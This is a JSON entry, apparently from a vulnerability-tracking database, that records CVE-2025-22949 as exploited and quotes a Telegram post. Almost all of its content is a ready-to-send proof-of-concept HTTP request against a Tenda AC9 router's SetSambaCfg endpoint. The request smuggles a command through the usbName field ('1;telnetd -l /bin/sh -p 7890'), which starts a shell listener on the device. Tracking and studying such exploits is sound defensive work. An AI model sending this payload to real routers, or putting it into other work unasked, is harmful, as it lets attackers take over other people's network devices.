{"uuid": "12be70eb-81b6-4790-af5d-a3f203785697", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22949", "type": "exploited", "source": "https://t.me/haj3imad/908", "content": "Tenda_AC9V1.0_V15.03.05.19_formSetSambaConf_doSystemCmd_CI\n\nCVE-2025-22949\n\nPOST /goform/SetSambaCfg HTTP/1.1\nHost: 192.168.0.1\nContent-Length: 47\nX-Requested-With: XMLHttpRequest\nAccept-Language: zh-CN,zh;q=0.9\nAccept: */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36\nOrigin: http://192.168.0.1\nReferer: http://192.168.0.1/wifi_wps.html?random=0.5358142303799198&amp;\nAccept-Encoding: gzip, deflate, br\nCookie: password=5f4dcc3b5aa765d61d8327deb882cf99isqtgb\nConnection: keep-alive\n\naction=del&amp;usbName=1;telnetd -l /bin/sh -p 7890\n\n#exploit #poc", "creation_timestamp": "2025-02-19T05:21:03.000000Z"}